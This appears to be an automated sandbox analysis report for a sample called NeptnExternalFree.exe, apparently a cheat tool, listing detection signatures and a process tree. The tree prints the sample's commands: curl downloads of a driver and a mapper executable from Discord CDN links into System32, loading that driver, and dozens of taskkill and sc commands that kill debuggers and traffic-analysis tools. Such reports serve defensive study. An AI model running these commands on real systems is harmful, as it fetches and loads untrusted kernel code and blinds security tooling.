88ca77450527c906fe9d75e2f9f12280fa8dadd02691c15efdb487bd875499a6

Analysis

max time kernel
22s
max time network
32s
platform
windows10-2004_x64
resource
win10v2004-20230220-en
resource tags

arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system
submitted
26-03-2023 02:05

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

NeptnExternalFree.exe
Size

3.5MB
MD5

01e8ba61787a19bc8838fe845fdbeec1
SHA1

6ee449056214222388c91d147712c035a0e8dec2
SHA256

88ca77450527c906fe9d75e2f9f12280fa8dadd02691c15efdb487bd875499a6
SHA512

9fbb531764adfb9c6cae4735405d5d302eeb2bed85c028a5e69719b29b18f61f598ef1021bd6bb1ff5c826992b5c84e4c6d547d55b202127ee88ceec666ab6db
SSDEEP

49152:yn3wi5r0to7oRoAqcOBLCDjhYCuge31JXigR4Hd20Z3taNxPMb68OX6E8kFWOZR1:yA+YtuvcSyjhjovigRWnZ9MObTOLvf48

Score

9^/10

evasion persistence themida trojan

Malware Config

Signatures

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs
evasion

Query Registry
T1012

Virtualization/Sandbox Evasion
T1497

Processes:

NeptnExternalFree.exe

description ioc process

Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ NeptnExternalFree.exe
Downloads MZ/PE file

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	NeptnExternalFree.exe

Sets service image path in registry 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

mapper.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\frAQBc8Wsa1xVPfv\ImagePath = "\\??\\C:\\Users\\Admin\\AppData\\Local\\Temp\\frAQBc8Wsa1xVPfv"	mapper.exe

Stops running service(s) 3 TTPs
evasion

Modify Existing Service
T1031

Impair Defenses
T1562

Service Stop
T1489

Checks BIOS information in registry 2 TTPs 2 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

NeptnExternalFree.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	NeptnExternalFree.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	NeptnExternalFree.exe

Executes dropped EXE 1 IoCs

Processes:

mapper.exe

pid process

1440 mapper.exe

pid	process
1440	mapper.exe

Themida packer 5 IoCs

Detects Themida, an advanced Windows software protection system.

themida

Processes:

resource	yara_rule
behavioral2/memory/4904-133-0x00007FF7C1E60000-0x00007FF7C27CA000-memory.dmp	themida
behavioral2/memory/4904-134-0x00007FF7C1E60000-0x00007FF7C27CA000-memory.dmp	themida
behavioral2/memory/4904-135-0x00007FF7C1E60000-0x00007FF7C27CA000-memory.dmp	themida
behavioral2/memory/4904-136-0x00007FF7C1E60000-0x00007FF7C27CA000-memory.dmp	themida
behavioral2/memory/4904-383-0x00007FF7C1E60000-0x00007FF7C27CA000-memory.dmp	themida

Checks whether UAC is enabled 1 TTPs 1 IoCs
evasion trojan

System Information Discovery
T1082

Processes:

NeptnExternalFree.exe

description ioc process

Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA NeptnExternalFree.exe
Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102
Drops file in System32 directory 2 IoCs

Processes:

curl.execurl.exe

description ioc process

File created C:\Windows\System32\NeptnDriver.sys curl.exe
File created C:\Windows\System32\mapper.exe curl.exe
Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs

Processes:

NeptnExternalFree.exe

pid process

4904 NeptnExternalFree.exe
Launches sc.exe 13 IoCs
Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exe

pid process

4404 sc.exe
3012 sc.exe
2848 sc.exe
3956 sc.exe
1616 sc.exe
3408 sc.exe
1572 sc.exe
4724 sc.exe
376 sc.exe
3400 sc.exe
4664 sc.exe
2564 sc.exe
512 sc.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	NeptnExternalFree.exe

description	ioc	process
File created	C:\Windows\System32\NeptnDriver.sys	curl.exe
File created	C:\Windows\System32\mapper.exe	curl.exe

pid	process
4904	NeptnExternalFree.exe

pid	process
4404	sc.exe
3012	sc.exe
2848	sc.exe
3956	sc.exe
1616	sc.exe
3408	sc.exe
1572	sc.exe
4724	sc.exe
376	sc.exe
3400	sc.exe
4664	sc.exe
2564	sc.exe
512	sc.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

msedge.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe

Kills process with taskkill 59 IoCs

evasion

Processes:

taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exe

pid	process
1796	taskkill.exe
1364	taskkill.exe
1456	taskkill.exe
1272	taskkill.exe
2268	taskkill.exe
2260	taskkill.exe
4240	taskkill.exe
1372	taskkill.exe
1592	taskkill.exe
4168	taskkill.exe
2104	taskkill.exe
3588	taskkill.exe
2784	taskkill.exe
3024	taskkill.exe
1428	taskkill.exe
4788	taskkill.exe
2004	taskkill.exe
3384	taskkill.exe
4972	taskkill.exe
4956	taskkill.exe
3020	taskkill.exe
3400	taskkill.exe
3740	taskkill.exe
4312	taskkill.exe
3588	taskkill.exe
912	taskkill.exe
5092	taskkill.exe
4952	taskkill.exe
3336	taskkill.exe
856	taskkill.exe
2864	taskkill.exe
2864	taskkill.exe
3732	taskkill.exe
4696	taskkill.exe
4256	taskkill.exe
4092	taskkill.exe
2016	taskkill.exe
708	taskkill.exe
2532	taskkill.exe
2132	taskkill.exe
3692	taskkill.exe
708	taskkill.exe
4760	taskkill.exe
4580	taskkill.exe
5012	taskkill.exe
4276	taskkill.exe
1340	taskkill.exe
1052	taskkill.exe
3352	taskkill.exe
3092	taskkill.exe
5116	taskkill.exe
2820	taskkill.exe
4280	taskkill.exe
3564	taskkill.exe
2568	taskkill.exe
4236	taskkill.exe
1092	taskkill.exe
652	taskkill.exe
4564	taskkill.exe

Modifies registry class 1 IoCs

Processes:

msedge.exe

description ioc process

Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ msedge.exe
Suspicious behavior: EnumeratesProcesses 4 IoCs

Processes:

msedge.exemsedge.exe

pid process

4780 msedge.exe
4780 msedge.exe
2748 msedge.exe
2748 msedge.exe
Suspicious behavior: LoadsDriver 1 IoCs

Processes:

mapper.exe

pid process

1440 mapper.exe
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 3 IoCs

Processes:

msedge.exe

pid process

2748 msedge.exe
2748 msedge.exe
2748 msedge.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\	msedge.exe

pid	process
4780	msedge.exe
4780	msedge.exe
2748	msedge.exe
2748	msedge.exe

pid	process
1440	mapper.exe

pid	process
2748	msedge.exe
2748	msedge.exe
2748	msedge.exe

Suspicious use of AdjustPrivilegeToken 45 IoCs

Processes:

taskkill.exetaskkill.exetaskkill.exeTrustedInstaller.exetaskkill.exetaskkill.exetaskkill.exetaskkill.execmd.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exemapper.exetaskkill.exetaskkill.execmd.execmd.exetaskkill.execmd.exetaskkill.exetaskkill.execmd.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exe

description	pid	process
Token: SeDebugPrivilege	3352	taskkill.exe
Token: SeDebugPrivilege	1428	taskkill.exe
Token: SeDebugPrivilege	652	taskkill.exe
Token: SeDebugPrivilege	1592	TrustedInstaller.exe
Token: SeDebugPrivilege	3692	taskkill.exe
Token: SeDebugPrivilege	3564	taskkill.exe
Token: SeDebugPrivilege	5116	taskkill.exe
Token: SeDebugPrivilege	2568	taskkill.exe
Token: SeDebugPrivilege	4580	cmd.exe
Token: SeDebugPrivilege	4168	taskkill.exe
Token: SeDebugPrivilege	4788	taskkill.exe
Token: SeDebugPrivilege	3740	taskkill.exe
Token: SeDebugPrivilege	3336	taskkill.exe
Token: SeDebugPrivilege	2104	taskkill.exe
Token: SeDebugPrivilege	4564	taskkill.exe
Token: SeDebugPrivilege	1456	taskkill.exe
Token: SeLoadDriverPrivilege	1440	mapper.exe
Token: SeDebugPrivilege	3588	taskkill.exe
Token: SeDebugPrivilege	1272	taskkill.exe
Token: SeDebugPrivilege	2864	cmd.exe
Token: SeDebugPrivilege	4312	cmd.exe
Token: SeDebugPrivilege	708	taskkill.exe
Token: SeDebugPrivilege	3092	cmd.exe
Token: SeDebugPrivilege	2268	taskkill.exe
Token: SeDebugPrivilege	856	taskkill.exe
Token: SeDebugPrivilege	4236	cmd.exe
Token: SeDebugPrivilege	2004	taskkill.exe
Token: SeDebugPrivilege	2820	taskkill.exe
Token: SeDebugPrivilege	2260	taskkill.exe
Token: SeDebugPrivilege	1796	taskkill.exe
Token: SeDebugPrivilege	5012	taskkill.exe
Token: SeDebugPrivilege	4240	taskkill.exe
Token: SeDebugPrivilege	3588	taskkill.exe
Token: SeDebugPrivilege	2532	taskkill.exe
Token: SeDebugPrivilege	2016	taskkill.exe
Token: SeDebugPrivilege	4972	taskkill.exe
Token: SeDebugPrivilege	3020	taskkill.exe
Token: SeDebugPrivilege	708	taskkill.exe
Token: SeDebugPrivilege	912	taskkill.exe
Token: SeDebugPrivilege	2784	taskkill.exe
Token: SeDebugPrivilege	4760	taskkill.exe
Token: SeDebugPrivilege	3732	taskkill.exe
Token: SeDebugPrivilege	4696	taskkill.exe
Token: SeDebugPrivilege	4256	taskkill.exe
Token: SeDebugPrivilege	4276	taskkill.exe

Suspicious use of FindShellTrayWindow 4 IoCs

Processes:

msedge.exe

pid process

2748 msedge.exe
2748 msedge.exe
2748 msedge.exe
2748 msedge.exe

pid	process
2748	msedge.exe
2748	msedge.exe
2748	msedge.exe
2748	msedge.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

NeptnExternalFree.execmd.exemsedge.exe

description	pid	process	target process
PID 4904 wrote to memory of 3588	4904	NeptnExternalFree.exe	cmd.exe
PID 4904 wrote to memory of 3588	4904	NeptnExternalFree.exe	cmd.exe
PID 3588 wrote to memory of 2748	3588	cmd.exe	msedge.exe
PID 3588 wrote to memory of 2748	3588	cmd.exe	msedge.exe
PID 2748 wrote to memory of 4072	2748	msedge.exe	msedge.exe
PID 2748 wrote to memory of 4072	2748	msedge.exe	msedge.exe
PID 2748 wrote to memory of 3268	2748	msedge.exe	msedge.exe
PID 2748 wrote to memory of 3268	2748	msedge.exe	msedge.exe
PID 2748 wrote to memory of 3268	2748	msedge.exe	msedge.exe
PID 2748 wrote to memory of 3268	2748	msedge.exe	msedge.exe
PID 2748 wrote to memory of 3268	2748	msedge.exe	msedge.exe
PID 2748 wrote to memory of 3268	2748	msedge.exe	msedge.exe
PID 2748 wrote to memory of 3268	2748	msedge.exe	msedge.exe
PID 2748 wrote to memory of 3268	2748	msedge.exe	msedge.exe
PID 2748 wrote to memory of 3268	2748	msedge.exe	msedge.exe
PID 2748 wrote to memory of 3268	2748	msedge.exe	msedge.exe
PID 2748 wrote to memory of 3268	2748	msedge.exe	msedge.exe
PID 2748 wrote to memory of 3268	2748	msedge.exe	msedge.exe
PID 2748 wrote to memory of 3268	2748	msedge.exe	msedge.exe
PID 2748 wrote to memory of 3268	2748	msedge.exe	msedge.exe
PID 2748 wrote to memory of 3268	2748	msedge.exe	msedge.exe
PID 2748 wrote to memory of 3268	2748	msedge.exe	msedge.exe
PID 2748 wrote to memory of 3268	2748	msedge.exe	msedge.exe
PID 2748 wrote to memory of 3268	2748	msedge.exe	msedge.exe
PID 2748 wrote to memory of 3268	2748	msedge.exe	msedge.exe
PID 2748 wrote to memory of 3268	2748	msedge.exe	msedge.exe
PID 2748 wrote to memory of 3268	2748	msedge.exe	msedge.exe
PID 2748 wrote to memory of 3268	2748	msedge.exe	msedge.exe
PID 2748 wrote to memory of 3268	2748	msedge.exe	msedge.exe
PID 2748 wrote to memory of 3268	2748	msedge.exe	msedge.exe
PID 2748 wrote to memory of 3268	2748	msedge.exe	msedge.exe
PID 2748 wrote to memory of 3268	2748	msedge.exe	msedge.exe
PID 2748 wrote to memory of 3268	2748	msedge.exe	msedge.exe
PID 2748 wrote to memory of 3268	2748	msedge.exe	msedge.exe
PID 2748 wrote to memory of 3268	2748	msedge.exe	msedge.exe
PID 2748 wrote to memory of 3268	2748	msedge.exe	msedge.exe
PID 2748 wrote to memory of 3268	2748	msedge.exe	msedge.exe
PID 2748 wrote to memory of 3268	2748	msedge.exe	msedge.exe
PID 2748 wrote to memory of 3268	2748	msedge.exe	msedge.exe
PID 2748 wrote to memory of 3268	2748	msedge.exe	msedge.exe
PID 2748 wrote to memory of 3268	2748	msedge.exe	msedge.exe
PID 2748 wrote to memory of 3268	2748	msedge.exe	msedge.exe
PID 2748 wrote to memory of 3268	2748	msedge.exe	msedge.exe
PID 2748 wrote to memory of 3268	2748	msedge.exe	msedge.exe
PID 2748 wrote to memory of 3268	2748	msedge.exe	msedge.exe
PID 2748 wrote to memory of 3268	2748	msedge.exe	msedge.exe
PID 2748 wrote to memory of 4780	2748	msedge.exe	msedge.exe
PID 2748 wrote to memory of 4780	2748	msedge.exe	msedge.exe
PID 2748 wrote to memory of 2764	2748	msedge.exe	msedge.exe
PID 2748 wrote to memory of 2764	2748	msedge.exe	msedge.exe
PID 2748 wrote to memory of 2764	2748	msedge.exe	msedge.exe
PID 2748 wrote to memory of 2764	2748	msedge.exe	msedge.exe
PID 2748 wrote to memory of 2764	2748	msedge.exe	msedge.exe
PID 2748 wrote to memory of 2764	2748	msedge.exe	msedge.exe
PID 2748 wrote to memory of 2764	2748	msedge.exe	msedge.exe
PID 2748 wrote to memory of 2764	2748	msedge.exe	msedge.exe
PID 2748 wrote to memory of 2764	2748	msedge.exe	msedge.exe
PID 2748 wrote to memory of 2764	2748	msedge.exe	msedge.exe
PID 2748 wrote to memory of 2764	2748	msedge.exe	msedge.exe
PID 2748 wrote to memory of 2764	2748	msedge.exe	msedge.exe
PID 2748 wrote to memory of 2764	2748	msedge.exe	msedge.exe
PID 2748 wrote to memory of 2764	2748	msedge.exe	msedge.exe
PID 2748 wrote to memory of 2764	2748	msedge.exe	msedge.exe
PID 2748 wrote to memory of 2764	2748	msedge.exe	msedge.exe

C:\Users\Admin\AppData\Local\Temp\NeptnExternalFree.exe
"C:\Users\Admin\AppData\Local\Temp\NeptnExternalFree.exe"
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of WriteProcessMemory
PID:4904

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c start https://discord.gg/xCRS6yyPF6
2⤵
- Suspicious use of WriteProcessMemory
PID:3588

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://discord.gg/xCRS6yyPF6
3⤵
- Enumerates system info in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:2748

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffa653046f8,0x7ffa65304708,0x7ffa65304718
4⤵
PID:4072

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1480,12209249902841091861,4882319332057406431,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2180 /prefetch:2
4⤵
PID:3268

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1480,12209249902841091861,4882319332057406431,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2260 /prefetch:3
4⤵
- Suspicious behavior: EnumeratesProcesses
PID:4780

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1480,12209249902841091861,4882319332057406431,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2684 /prefetch:8
4⤵
PID:2764

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1480,12209249902841091861,4882319332057406431,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3660 /prefetch:1
4⤵
PID:3988

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1480,12209249902841091861,4882319332057406431,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3676 /prefetch:1
4⤵
PID:4524

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1480,12209249902841091861,4882319332057406431,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5252 /prefetch:1
4⤵
PID:1820

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c curl https://cdn.discordapp.com/attachments/879146399290241105/1070367957353500782/NeptnDriver.sys --output C:\Windows\System32\NeptnDriver.sys >nul 2>&1
2⤵
PID:2252

C:\Windows\system32\curl.exe
curl https://cdn.discordapp.com/attachments/879146399290241105/1070367957353500782/NeptnDriver.sys --output C:\Windows\System32\NeptnDriver.sys
3⤵
- Drops file in System32 directory
PID:4092

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerUI.exe >nul 2>&1
2⤵
PID:1060

C:\Windows\system32\taskkill.exe
taskkill /f /im HTTPDebuggerUI.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3352

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerSvc.exe >nul 2>&1
2⤵
PID:2936

C:\Windows\system32\taskkill.exe
taskkill /f /im HTTPDebuggerSvc.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1428

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /f /im Ida64.exe >nul 2>&1
2⤵
PID:5096

C:\Windows\system32\taskkill.exe
taskkill /f /im Ida64.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:652

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c curl https://cdn.discordapp.com/attachments/879146399290241105/1057075244617187368/mapper.exe --output C:\Windows\System32\mapper.exe >nul 2>&1
2⤵
PID:3356

C:\Windows\system32\curl.exe
curl https://cdn.discordapp.com/attachments/879146399290241105/1057075244617187368/mapper.exe --output C:\Windows\System32\mapper.exe
3⤵
- Drops file in System32 directory
PID:5048

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /f /im OllyDbg.exe >nul 2>&1
2⤵
PID:2552

C:\Windows\system32\taskkill.exe
taskkill /f /im OllyDbg.exe
3⤵
- Kills process with taskkill
PID:1592

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /f /im Dbg64.exe >nul 2>&1
2⤵
PID:2816

C:\Windows\system32\taskkill.exe
taskkill /f /im Dbg64.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3692

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /f /im Dbg32.exe >nul 2>&1
2⤵
PID:2820

C:\Windows\system32\taskkill.exe
taskkill /f /im Dbg32.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3564

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c sc stop HTTPDebuggerPro >nul 2>&1
2⤵
PID:2588

C:\Windows\system32\sc.exe
sc stop HTTPDebuggerPro
3⤵
- Launches sc.exe
PID:376

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T >nul 2>&1
2⤵
PID:5012

C:\Windows\system32\taskkill.exe
taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:5116

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&1
2⤵
PID:2016

C:\Windows\system32\taskkill.exe
taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2568

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T >nul 2>&1
2⤵
PID:4784

C:\Windows\system32\taskkill.exe
taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T
3⤵
- Kills process with taskkill
PID:4580

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerUI.exe >nul 2>&1
2⤵
PID:5084

C:\Windows\system32\taskkill.exe
taskkill /f /im HTTPDebuggerUI.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4168

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerSvc.exe >nul 2>&1
2⤵
PID:4340

C:\Windows\system32\taskkill.exe
taskkill /f /im HTTPDebuggerSvc.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4788

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c sc stop HTTPDebuggerPro >nul 2>&1
2⤵
PID:928

C:\Windows\system32\sc.exe
sc stop HTTPDebuggerPro
3⤵
- Launches sc.exe
PID:3400

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T >nul 2>&1
2⤵
PID:4956

C:\Windows\system32\taskkill.exe
taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3740

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&1
2⤵
PID:1388

C:\Windows\system32\taskkill.exe
taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3336

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T >nul 2>&1
2⤵
PID:1532

C:\Windows\system32\taskkill.exe
taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2104

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq x64dbg*" /IM * /F /T >nul 2>&1
2⤵
PID:964

C:\Windows\system32\taskkill.exe
taskkill /FI "IMAGENAME eq x64dbg*" /IM * /F /T
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4564

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq x32dbg*" /IM * /F /T >nul 2>&1
2⤵
PID:1400

C:\Windows\system32\taskkill.exe
taskkill /FI "IMAGENAME eq x32dbg*" /IM * /F /T
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1456

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\System32\mapper.exe C:\Windows\System32\NeptnDriver.sys
2⤵
PID:4892

C:\Windows\System32\mapper.exe
C:\Windows\System32\mapper.exe C:\Windows\System32\NeptnDriver.sys
3⤵
- Sets service image path in registry
- Executes dropped EXE
- Suspicious behavior: LoadsDriver
- Suspicious use of AdjustPrivilegeToken
PID:1440

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq ollydbg*" /IM * /F /T >nul 2>&1
2⤵
PID:972

C:\Windows\system32\taskkill.exe
taskkill /FI "IMAGENAME eq ollydbg*" /IM * /F /T
3⤵
- Kills process with taskkill
PID:3588

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c cls
2⤵
PID:4924

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq fiddler*" /IM * /F /T >nul 2>&1
2⤵
PID:1720

C:\Windows\system32\taskkill.exe
taskkill /FI "IMAGENAME eq fiddler*" /IM * /F /T
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1272

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c cls
2⤵
PID:4048

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq fiddler*" /IM * /F /T >nul 2>&1
2⤵
PID:4972

C:\Windows\system32\taskkill.exe
taskkill /FI "IMAGENAME eq fiddler*" /IM * /F /T
3⤵
- Kills process with taskkill
PID:2864

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq charles*" /IM * /F /T >nul 2>&1
2⤵
PID:3020

C:\Windows\system32\taskkill.exe
taskkill /FI "IMAGENAME eq charles*" /IM * /F /T
3⤵
- Kills process with taskkill
PID:4312

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T >nul 2>&1
2⤵
PID:3144

C:\Windows\system32\taskkill.exe
taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T
3⤵
- Kills process with taskkill
PID:708

C:\Windows\system32\cmd.exe
